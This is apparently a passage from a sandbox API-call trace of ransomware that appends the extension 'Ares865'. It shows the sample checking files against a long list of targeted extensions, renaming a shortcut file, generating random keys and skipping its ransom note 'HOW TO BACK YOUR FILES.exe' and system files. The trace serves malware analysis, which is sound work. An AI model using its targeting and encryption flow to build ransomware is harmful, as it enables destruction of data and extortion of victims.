[0058.240] lstrlenW (lpString="gdb") returned 3 [0058.240] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0058.240] lstrlenW (lpString="grdb") returned 4 [0058.240] lstrcmpiW (lpString1=".lnk", lpString2="grdb") returned -1 [0058.240] lstrlenW (lpString="gwi") returned 3 [0058.240] lstrcmpiW (lpString1="lnk", lpString2="gwi") returned 1 [0058.240] lstrlenW (lpString="hdb") returned 3 [0058.240] lstrcmpiW (lpString1="lnk", lpString2="hdb") returned 1 [0058.240] lstrlenW (lpString="his") returned 3 [0058.240] lstrcmpiW (lpString1="lnk", lpString2="his") returned 1 [0058.240] lstrlenW (lpString="ib") returned 2 [0058.240] lstrcmpiW (lpString1="nk", lpString2="ib") returned 1 [0058.240] lstrlenW (lpString="idb") returned 3 [0058.240] lstrcmpiW (lpString1="lnk", lpString2="idb") returned 1 [0058.240] lstrlenW (lpString="ihx") returned 3 [0058.240] lstrcmpiW (lpString1="lnk", lpString2="ihx") returned 1 [0058.240] lstrlenW (lpString="itdb") returned 4 [0058.240] lstrcmpiW (lpString1=".lnk", lpString2="itdb") returned -1 [0058.240] lstrlenW (lpString="itw") returned 3 [0058.241] lstrcmpiW (lpString1="lnk", lpString2="itw") returned 1 [0058.241] lstrlenW (lpString="jet") returned 3 [0058.241] lstrcmpiW (lpString1="lnk", lpString2="jet") returned 1 [0058.241] lstrlenW (lpString="jtx") returned 3 [0058.241] lstrcmpiW (lpString1="lnk", lpString2="jtx") returned 1 [0058.241] lstrlenW (lpString="kdb") returned 3 [0058.241] lstrcmpiW (lpString1="lnk", lpString2="kdb") returned 1 [0058.241] lstrlenW (lpString="kexi") returned 4 [0058.241] lstrcmpiW (lpString1=".lnk", lpString2="kexi") returned -1 [0058.241] lstrlenW (lpString="kexic") returned 5 [0058.241] lstrcmpiW (lpString1="n.lnk", lpString2="kexic") returned 1 [0058.241] lstrlenW (lpString="kexis") returned 5 [0058.241] lstrcmpiW (lpString1="n.lnk", lpString2="kexis") returned 1 [0058.241] lstrlenW (lpString="lgc") returned 3 [0058.241] lstrcmpiW (lpString1="lnk", lpString2="lgc") returned 1 [0058.241] lstrlenW (lpString="lwx") returned 3 [0058.241] lstrcmpiW (lpString1="lnk", lpString2="lwx") returned -1 [0058.241] lstrlenW (lpString="maf") returned 3 [0058.241] lstrcmpiW (lpString1="lnk", lpString2="maf") returned -1 [0058.241] lstrlenW (lpString="maq") returned 3 [0058.241] lstrcmpiW (lpString1="lnk", lpString2="maq") returned -1 [0058.241] lstrlenW (lpString="mar") returned 3 [0058.241] lstrcmpiW (lpString1="lnk", lpString2="mar") returned -1 [0058.241] lstrlenW (lpString="marshal") returned 7 [0058.241] lstrlenW (lpString="mas") returned 3 [0058.241] lstrcmpiW (lpString1="lnk", lpString2="mas") returned -1 [0058.241] lstrlenW (lpString="mav") returned 3 [0058.241] lstrcmpiW (lpString1="lnk", lpString2="mav") returned -1 [0058.241] lstrlenW (lpString="maw") returned 3 [0058.241] lstrcmpiW (lpString1="lnk", lpString2="maw") returned -1 [0058.241] lstrlenW (lpString="mdbhtml") returned 7 [0058.241] lstrlenW (lpString="mdn") returned 3 [0058.241] lstrcmpiW (lpString1="lnk", lpString2="mdn") returned -1 [0058.241] lstrlenW (lpString="mdt") returned 3 [0058.241] lstrcmpiW (lpString1="lnk", lpString2="mdt") returned -1 [0058.241] lstrlenW (lpString="mfd") returned 3 [0058.241] lstrcmpiW (lpString1="lnk", lpString2="mfd") returned -1 [0058.241] lstrlenW (lpString="mpd") returned 3 [0058.242] lstrcmpiW (lpString1="lnk", lpString2="mpd") returned -1 [0058.242] lstrlenW (lpString="mrg") returned 3 [0058.242] lstrcmpiW (lpString1="lnk", lpString2="mrg") returned -1 [0058.242] lstrlenW (lpString="mud") returned 3 [0058.242] lstrcmpiW (lpString1="lnk", lpString2="mud") returned -1 [0058.242] lstrlenW (lpString="mwb") returned 3 [0058.242] lstrcmpiW (lpString1="lnk", lpString2="mwb") returned -1 [0058.242] lstrlenW (lpString="myd") returned 3 [0058.242] lstrcmpiW (lpString1="lnk", lpString2="myd") returned -1 [0058.242] lstrlenW (lpString="ndf") returned 3 [0058.242] lstrcmpiW (lpString1="lnk", lpString2="ndf") returned -1 [0058.242] lstrlenW (lpString="nnt") returned 3 [0058.242] lstrcmpiW (lpString1="lnk", lpString2="nnt") returned -1 [0058.242] lstrlenW (lpString="nrmlib") returned 6 [0058.242] lstrcmpiW (lpString1="un.lnk", lpString2="nrmlib") returned 1 [0058.242] lstrlenW (lpString="ns2") returned 3 [0058.242] lstrcmpiW (lpString1="lnk", lpString2="ns2") returned -1 [0058.242] lstrlenW (lpString="ns3") returned 3 [0058.242] lstrcmpiW (lpString1="lnk", lpString2="ns3") returned -1 [0058.242] lstrlenW (lpString="ns4") returned 3 [0058.242] lstrcmpiW (lpString1="lnk", lpString2="ns4") returned -1 [0058.242] lstrlenW (lpString="nsf") returned 3 [0058.242] lstrcmpiW (lpString1="lnk", lpString2="nsf") returned -1 [0058.242] lstrlenW (lpString="nv") returned 2 [0058.242] lstrcmpiW (lpString1="nk", lpString2="nv") returned -1 [0058.242] lstrlenW (lpString="nv2") returned 3 [0058.242] lstrcmpiW (lpString1="lnk", lpString2="nv2") returned -1 [0058.242] lstrlenW (lpString="nwdb") returned 4 [0058.242] lstrcmpiW (lpString1=".lnk", lpString2="nwdb") returned -1 [0058.242] lstrlenW (lpString="nyf") returned 3 [0058.242] lstrcmpiW (lpString1="lnk", lpString2="nyf") returned -1 [0058.242] lstrlenW (lpString="odb") returned 3 [0058.242] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0058.242] lstrlenW (lpString="odb") returned 3 [0058.242] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0058.242] lstrlenW (lpString="oqy") returned 3 [0058.243] lstrcmpiW (lpString1="lnk", lpString2="oqy") returned -1 [0058.243] lstrlenW (lpString="ora") returned 3 [0058.243] lstrcmpiW (lpString1="lnk", lpString2="ora") returned -1 [0058.243] lstrlenW (lpString="orx") returned 3 [0058.243] lstrcmpiW (lpString1="lnk", lpString2="orx") returned -1 [0058.243] lstrlenW (lpString="owc") returned 3 [0058.243] lstrcmpiW (lpString1="lnk", lpString2="owc") returned -1 [0058.243] lstrlenW (lpString="p96") returned 3 [0058.243] lstrcmpiW (lpString1="lnk", lpString2="p96") returned -1 [0058.243] lstrlenW (lpString="p97") returned 3 [0058.243] lstrcmpiW (lpString1="lnk", lpString2="p97") returned -1 [0058.243] lstrlenW (lpString="pan") returned 3 [0058.243] lstrcmpiW (lpString1="lnk", lpString2="pan") returned -1 [0058.243] lstrlenW (lpString="pdb") returned 3 [0058.243] lstrcmpiW (lpString1="lnk", lpString2="pdb") returned -1 [0058.243] lstrlenW (lpString="pdm") returned 3 [0058.243] lstrcmpiW (lpString1="lnk", lpString2="pdm") returned -1 [0058.243] lstrlenW (lpString="pnz") returned 3 [0058.243] lstrcmpiW (lpString1="lnk", lpString2="pnz") returned -1 [0058.243] lstrlenW (lpString="qry") returned 3 [0058.243] lstrcmpiW (lpString1="lnk", lpString2="qry") returned -1 [0058.243] lstrlenW (lpString="qvd") returned 3 [0058.243] lstrcmpiW (lpString1="lnk", lpString2="qvd") returned -1 [0058.243] lstrlenW (lpString="rbf") returned 3 [0058.243] lstrcmpiW (lpString1="lnk", lpString2="rbf") returned -1 [0058.243] lstrlenW (lpString="rctd") returned 4 [0058.243] lstrcmpiW (lpString1=".lnk", lpString2="rctd") returned -1 [0058.243] lstrlenW (lpString="rod") returned 3 [0058.243] lstrcmpiW (lpString1="lnk", lpString2="rod") returned -1 [0058.243] lstrlenW (lpString="rodx") returned 4 [0058.243] lstrcmpiW (lpString1=".lnk", lpString2="rodx") returned -1 [0058.243] lstrlenW (lpString="rpd") returned 3 [0058.243] lstrcmpiW (lpString1="lnk", lpString2="rpd") returned -1 [0058.243] lstrlenW (lpString="rsd") returned 3 [0058.243] lstrcmpiW (lpString1="lnk", lpString2="rsd") returned -1 [0058.243] lstrlenW (lpString="sas7bdat") returned 8 [0058.243] lstrlenW (lpString="sbf") returned 3 [0058.243] lstrcmpiW (lpString1="lnk", lpString2="sbf") returned -1 [0058.244] lstrlenW (lpString="scx") returned 3 [0058.244] lstrcmpiW (lpString1="lnk", lpString2="scx") returned -1 [0058.244] lstrlenW (lpString="sdb") returned 3 [0058.244] lstrcmpiW (lpString1="lnk", lpString2="sdb") returned -1 [0058.244] lstrlenW (lpString="sdc") returned 3 [0058.244] lstrcmpiW (lpString1="lnk", lpString2="sdc") returned -1 [0058.244] lstrlenW (lpString="sdf") returned 3 [0058.244] lstrcmpiW (lpString1="lnk", lpString2="sdf") returned -1 [0058.244] lstrlenW (lpString="sis") returned 3 [0058.244] lstrcmpiW (lpString1="lnk", lpString2="sis") returned -1 [0058.244] lstrlenW (lpString="spq") returned 3 [0058.244] lstrcmpiW (lpString1="lnk", lpString2="spq") returned -1 [0058.244] lstrlenW (lpString="te") returned 2 [0058.244] lstrcmpiW (lpString1="nk", lpString2="te") returned -1 [0058.244] lstrlenW (lpString="teacher") returned 7 [0058.244] lstrlenW (lpString="tmd") returned 3 [0058.244] lstrcmpiW (lpString1="lnk", lpString2="tmd") returned -1 [0058.244] lstrlenW (lpString="tps") returned 3 [0058.244] lstrcmpiW (lpString1="lnk", lpString2="tps") returned -1 [0058.244] lstrlenW (lpString="trc") returned 3 [0058.244] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0058.244] lstrlenW (lpString="trc") returned 3 [0058.244] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0058.244] lstrlenW (lpString="trm") returned 3 [0058.244] lstrcmpiW (lpString1="lnk", lpString2="trm") returned -1 [0058.244] lstrlenW (lpString="udb") returned 3 [0058.244] lstrcmpiW (lpString1="lnk", lpString2="udb") returned -1 [0058.244] lstrlenW (lpString="udl") returned 3 [0058.244] lstrcmpiW (lpString1="lnk", lpString2="udl") returned -1 [0058.244] lstrlenW (lpString="usr") returned 3 [0058.244] lstrcmpiW (lpString1="lnk", lpString2="usr") returned -1 [0058.244] lstrlenW (lpString="v12") returned 3 [0058.244] lstrcmpiW (lpString1="lnk", lpString2="v12") returned -1 [0058.244] lstrlenW (lpString="vis") returned 3 [0058.244] lstrcmpiW (lpString1="lnk", lpString2="vis") returned -1 [0058.244] lstrlenW (lpString="vpd") returned 3 [0058.245] lstrcmpiW (lpString1="lnk", lpString2="vpd") returned -1 [0058.245] lstrlenW (lpString="vvv") returned 3 [0058.245] lstrcmpiW (lpString1="lnk", lpString2="vvv") returned -1 [0058.245] lstrlenW (lpString="wdb") returned 3 [0058.245] lstrcmpiW (lpString1="lnk", lpString2="wdb") returned -1 [0058.245] lstrlenW (lpString="wmdb") returned 4 [0058.245] lstrcmpiW (lpString1=".lnk", lpString2="wmdb") returned -1 [0058.245] lstrlenW (lpString="wrk") returned 3 [0058.245] lstrcmpiW (lpString1="lnk", lpString2="wrk") returned -1 [0058.245] lstrlenW (lpString="xdb") returned 3 [0058.245] lstrcmpiW (lpString1="lnk", lpString2="xdb") returned -1 [0058.245] lstrlenW (lpString="xld") returned 3 [0058.245] lstrcmpiW (lpString1="lnk", lpString2="xld") returned -1 [0058.245] lstrlenW (lpString="xmlff") returned 5 [0058.245] lstrcmpiW (lpString1="n.lnk", lpString2="xmlff") returned -1 [0058.245] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\Run.lnk.Ares865") returned 69 [0058.245] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\Run.lnk" (normalized: "c:\\users\\default user\\start menu\\programs\\accessories\\run.lnk"), lpNewFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\Run.lnk.Ares865" (normalized: "c:\\users\\default user\\start menu\\programs\\accessories\\run.lnk.ares865"), dwFlags=0x1) returned 1 [0058.246] CreateFileW (lpFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\Run.lnk.Ares865" (normalized: "c:\\users\\default user\\start menu\\programs\\accessories\\run.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0058.246] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=262) returned 1 [0058.246] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0058.247] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0058.247] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0058.247] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f00d8) returned 1 [0058.247] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0058.247] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0058.248] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x410, lpName=0x0) returned 0x154 [0058.250] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x410) returned 0x190000 [0058.250] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f00d8) returned 1 [0058.251] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0058.251] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0058.251] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0058.251] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0058.251] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0058.251] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0058.251] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0058.251] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0058.251] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0058.252] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0058.252] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0058.252] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0058.252] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0058.252] CloseHandle (hObject=0x154) returned 1 [0058.252] CloseHandle (hObject=0x15c) returned 1 [0058.253] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0058.253] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2effc8 | out: hHeap=0x2b0000) returned 1 [0058.253] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0058.253] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49d98300, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49d98300, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="System Tools", cAlternateFileName="SYSTEM~1")) returned 1 [0058.253] lstrcmpiW (lpString1="System Tools", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0058.253] lstrcmpiW (lpString1="System Tools", lpString2="aoldtz.exe") returned 1 [0058.253] lstrcmpiW (lpString1="System Tools", lpString2=".") returned 1 [0058.253] lstrcmpiW (lpString1="System Tools", lpString2="..") returned 1 [0058.253] lstrcmpiW (lpString1="System Tools", lpString2="windows") returned -1 [0058.253] lstrcmpiW (lpString1="System Tools", lpString2="bootmgr") returned 1 [0058.253] lstrcmpiW (lpString1="System Tools", lpString2="temp") returned -1 [0058.253] lstrcmpiW (lpString1="System Tools", lpString2="pagefile.sys") returned 1 [0058.253] lstrcmpiW (lpString1="System Tools", lpString2="boot") returned 1 [0058.253] lstrcmpiW (lpString1="System Tools", lpString2="ids.txt") returned 1 [0058.254] lstrcmpiW (lpString1="System Tools", lpString2="ntuser.dat") returned 1 [0058.254] lstrcmpiW (lpString1="System Tools", lpString2="perflogs") returned 1 [0058.254] lstrcmpiW (lpString1="System Tools", lpString2="MSBuild") returned 1 [0058.254] lstrlenW (lpString="System Tools") returned 12 [0058.254] lstrlenW (lpString="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\Run.lnk") returned 61 [0058.254] lstrcpyW (in: lpString1=0x2cce46c, lpString2="System Tools" | out: lpString1="System Tools") returned="System Tools" [0058.254] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d23a0 [0058.254] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x86) returned 0x2e9e20 [0058.254] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d23a8 | out: ListHead=0x2e7710, ListEntry=0x2d23a8) returned 0x2d2388 [0058.254] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7dc80587, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x6392a20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7dfa026d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x4cc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Explorer.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 1 [0058.254] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0058.254] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="aoldtz.exe") returned 1 [0058.254] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2=".") returned 1 [0058.254] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="..") returned 1 [0058.254] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="windows") returned 1 [0058.254] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="bootmgr") returned 1 [0058.254] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="temp") returned 1 [0058.254] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="pagefile.sys") returned 1 [0058.254] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="boot") returned 1 [0058.254] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="ids.txt") returned 1 [0058.254] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="ntuser.dat") returned 1 [0058.254] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="perflogs") returned 1 [0058.254] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="MSBuild") returned 1 [0058.254] lstrlenW (lpString="Windows Explorer.lnk") returned 20 [0058.254] lstrlenW (lpString="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\System Tools") returned 66 [0058.254] lstrcpyW (in: lpString1=0x2cce46c, lpString2="Windows Explorer.lnk" | out: lpString1="Windows Explorer.lnk") returned="Windows Explorer.lnk" [0058.254] lstrlenW (lpString="Windows Explorer.lnk") returned 20 [0058.254] lstrlenW (lpString="Ares865") returned 7 [0058.254] lstrcmpiW (lpString1="rer.lnk", lpString2="Ares865") returned 1 [0058.254] lstrlenW (lpString=".dll") returned 4 [0058.254] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2=".dll") returned 1 [0058.254] lstrlenW (lpString=".lnk") returned 4 [0058.254] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2=".lnk") returned 1 [0058.254] lstrlenW (lpString=".ini") returned 4 [0058.254] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2=".ini") returned 1 [0058.254] lstrlenW (lpString=".sys") returned 4 [0058.255] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2=".sys") returned 1 [0058.255] lstrlenW (lpString="Windows Explorer.lnk") returned 20 [0058.255] lstrlenW (lpString="bak") returned 3 [0058.255] lstrcmpiW (lpString1="lnk", lpString2="bak") returned 1 [0058.255] lstrlenW (lpString="ba_") returned 3 [0058.255] lstrcmpiW (lpString1="lnk", lpString2="ba_") returned 1 [0058.255] lstrlenW (lpString="dbb") returned 3 [0058.255] lstrcmpiW (lpString1="lnk", lpString2="dbb") returned 1 [0058.255] lstrlenW (lpString="vmdk") returned 4 [0058.255] lstrcmpiW (lpString1=".lnk", lpString2="vmdk") returned -1 [0058.255] lstrlenW (lpString="rar") returned 3 [0058.255] lstrcmpiW (lpString1="lnk", lpString2="rar") returned -1 [0058.255] lstrlenW (lpString="zip") returned 3 [0058.255] lstrcmpiW (lpString1="lnk", lpString2="zip") returned -1 [0058.255] lstrlenW (lpString="tgz") returned 3 [0058.255] lstrcmpiW (lpString1="lnk", lpString2="tgz") returned -1 [0058.255] lstrlenW (lpString="vbox") returned 4 [0058.255] lstrcmpiW (lpString1=".lnk", lpString2="vbox") returned -1 [0058.255] lstrlenW (lpString="vdi") returned 3 [0058.255] lstrcmpiW (lpString1="lnk", lpString2="vdi") returned -1 [0058.255] lstrlenW (lpString="vhd") returned 3 [0058.255] lstrcmpiW (lpString1="lnk", lpString2="vhd") returned -1 [0058.255] lstrlenW (lpString="vhdx") returned 4 [0058.255] lstrcmpiW (lpString1=".lnk", lpString2="vhdx") returned -1 [0058.255] lstrlenW (lpString="avhd") returned 4 [0058.255] lstrcmpiW (lpString1=".lnk", lpString2="avhd") returned -1 [0058.255] lstrlenW (lpString="db") returned 2 [0058.255] lstrcmpiW (lpString1="nk", lpString2="db") returned 1 [0058.255] lstrlenW (lpString="db2") returned 3 [0058.255] lstrcmpiW (lpString1="lnk", lpString2="db2") returned 1 [0058.255] lstrlenW (lpString="db3") returned 3 [0058.255] lstrcmpiW (lpString1="lnk", lpString2="db3") returned 1 [0058.255] lstrlenW (lpString="dbf") returned 3 [0058.255] lstrcmpiW (lpString1="lnk", lpString2="dbf") returned 1 [0058.255] lstrlenW (lpString="mdf") returned 3 [0058.255] lstrcmpiW (lpString1="lnk", lpString2="mdf") returned -1 [0058.255] lstrlenW (lpString="mdb") returned 3 [0058.255] lstrcmpiW (lpString1="lnk", lpString2="mdb") returned -1 [0058.256] lstrlenW (lpString="sql") returned 3 [0058.256] lstrcmpiW (lpString1="lnk", lpString2="sql") returned -1 [0058.256] lstrlenW (lpString="sqlite") returned 6 [0058.256] lstrcmpiW (lpString1="er.lnk", lpString2="sqlite") returned -1 [0058.256] lstrlenW (lpString="sqlite3") returned 7 [0058.256] lstrcmpiW (lpString1="rer.lnk", lpString2="sqlite3") returned -1 [0058.256] lstrlenW (lpString="sqlitedb") returned 8 [0058.256] lstrcmpiW (lpString1="orer.lnk", lpString2="sqlitedb") returned -1 [0058.256] lstrlenW (lpString="xml") returned 3 [0058.256] lstrcmpiW (lpString1="lnk", lpString2="xml") returned -1 [0058.256] lstrlenW (lpString="$er") returned 3 [0058.256] lstrcmpiW (lpString1="lnk", lpString2="$er") returned 1 [0058.256] lstrlenW (lpString="4dd") returned 3 [0058.256] lstrcmpiW (lpString1="lnk", lpString2="4dd") returned 1 [0058.256] lstrlenW (lpString="4dl") returned 3 [0058.256] lstrcmpiW (lpString1="lnk", lpString2="4dl") returned 1 [0058.256] lstrlenW (lpString="^^^") returned 3 [0058.256] lstrcmpiW (lpString1="lnk", lpString2="^^^") returned 1 [0058.256] lstrlenW (lpString="abs") returned 3 [0058.256] lstrcmpiW (lpString1="lnk", lpString2="abs") returned 1 [0058.256] lstrlenW (lpString="abx") returned 3 [0058.256] lstrcmpiW (lpString1="lnk", lpString2="abx") returned 1 [0058.256] lstrlenW (lpString="accdb") returned 5 [0058.256] lstrcmpiW (lpString1="r.lnk", lpString2="accdb") returned 1 [0058.256] lstrlenW (lpString="accdc") returned 5 [0058.256] lstrcmpiW (lpString1="r.lnk", lpString2="accdc") returned 1 [0058.256] lstrlenW (lpString="accde") returned 5 [0058.256] lstrcmpiW (lpString1="r.lnk", lpString2="accde") returned 1 [0058.256] lstrlenW (lpString="accdr") returned 5 [0058.256] lstrcmpiW (lpString1="r.lnk", lpString2="accdr") returned 1 [0058.256] lstrlenW (lpString="accdt") returned 5 [0058.256] lstrcmpiW (lpString1="r.lnk", lpString2="accdt") returned 1 [0058.256] lstrlenW (lpString="accdw") returned 5 [0058.256] lstrcmpiW (lpString1="r.lnk", lpString2="accdw") returned 1 [0058.256] lstrlenW (lpString="accft") returned 5 [0058.256] lstrcmpiW (lpString1="r.lnk", lpString2="accft") returned 1 [0058.256] lstrlenW (lpString="adb") returned 3 [0058.256] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0058.257] lstrlenW (lpString="adb") returned 3 [0058.257] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0058.257] lstrlenW (lpString="ade") returned 3 [0058.257] lstrcmpiW (lpString1="lnk", lpString2="ade") returned 1 [0058.257] lstrlenW (lpString="adf") returned 3 [0058.257] lstrcmpiW (lpString1="lnk", lpString2="adf") returned 1 [0058.257] lstrlenW (lpString="adn") returned 3 [0058.257] lstrcmpiW (lpString1="lnk", lpString2="adn") returned 1 [0058.257] lstrlenW (lpString="adp") returned 3 [0058.257] lstrcmpiW (lpString1="lnk", lpString2="adp") returned 1 [0058.257] lstrlenW (lpString="alf") returned 3 [0058.257] lstrcmpiW (lpString1="lnk", lpString2="alf") returned 1 [0058.257] lstrlenW (lpString="ask") returned 3 [0058.257] lstrcmpiW (lpString1="lnk", lpString2="ask") returned 1 [0058.257] lstrlenW (lpString="btr") returned 3 [0058.257] lstrcmpiW (lpString1="lnk", lpString2="btr") returned 1 [0058.257] lstrlenW (lpString="cat") returned 3 [0058.257] lstrcmpiW (lpString1="lnk", lpString2="cat") returned 1 [0058.257] lstrlenW (lpString="cdb") returned 3 [0058.257] lstrcmpiW (lpString1="lnk", lpString2="cdb") returned 1 [0058.257] lstrlenW (lpString="ckp") returned 3 [0058.257] lstrcmpiW (lpString1="lnk", lpString2="ckp") returned 1 [0058.257] lstrlenW (lpString="cma") returned 3 [0058.257] lstrcmpiW (lpString1="lnk", lpString2="cma") returned 1 [0058.257] lstrlenW (lpString="cpd") returned 3 [0058.257] lstrcmpiW (lpString1="lnk", lpString2="cpd") returned 1 [0058.257] lstrlenW (lpString="dacpac") returned 6 [0058.257] lstrcmpiW (lpString1="er.lnk", lpString2="dacpac") returned 1 [0058.257] lstrlenW (lpString="dad") returned 3 [0058.257] lstrcmpiW (lpString1="lnk", lpString2="dad") returned 1 [0058.257] lstrlenW (lpString="dadiagrams") returned 10 [0058.257] lstrcmpiW (lpString1="plorer.lnk", lpString2="dadiagrams") returned 1 [0058.257] lstrlenW (lpString="daschema") returned 8 [0058.257] lstrcmpiW (lpString1="orer.lnk", lpString2="daschema") returned 1 [0058.257] lstrlenW (lpString="db-journal") returned 10 [0058.257] lstrcmpiW (lpString1="plorer.lnk", lpString2="db-journal") returned 1 [0058.257] lstrlenW (lpString="db-shm") returned 6 [0058.257] lstrcmpiW (lpString1="er.lnk", lpString2="db-shm") returned 1 [0058.258] lstrlenW (lpString="db-wal") returned 6 [0058.258] lstrcmpiW (lpString1="er.lnk", lpString2="db-wal") returned 1 [0058.258] lstrlenW (lpString="dbc") returned 3 [0058.258] lstrcmpiW (lpString1="lnk", lpString2="dbc") returned 1 [0058.258] lstrlenW (lpString="dbs") returned 3 [0058.258] lstrcmpiW (lpString1="lnk", lpString2="dbs") returned 1 [0058.258] lstrlenW (lpString="dbt") returned 3 [0058.258] lstrcmpiW (lpString1="lnk", lpString2="dbt") returned 1 [0058.258] lstrlenW (lpString="dbv") returned 3 [0058.258] lstrcmpiW (lpString1="lnk", lpString2="dbv") returned 1 [0058.258] lstrlenW (lpString="dbx") returned 3 [0058.258] lstrcmpiW (lpString1="lnk", lpString2="dbx") returned 1 [0058.258] lstrlenW (lpString="dcb") returned 3 [0058.258] lstrcmpiW (lpString1="lnk", lpString2="dcb") returned 1 [0058.258] lstrlenW (lpString="dct") returned 3 [0058.258] lstrcmpiW (lpString1="lnk", lpString2="dct") returned 1 [0058.258] lstrlenW (lpString="dcx") returned 3 [0058.258] lstrcmpiW (lpString1="lnk", lpString2="dcx") returned 1 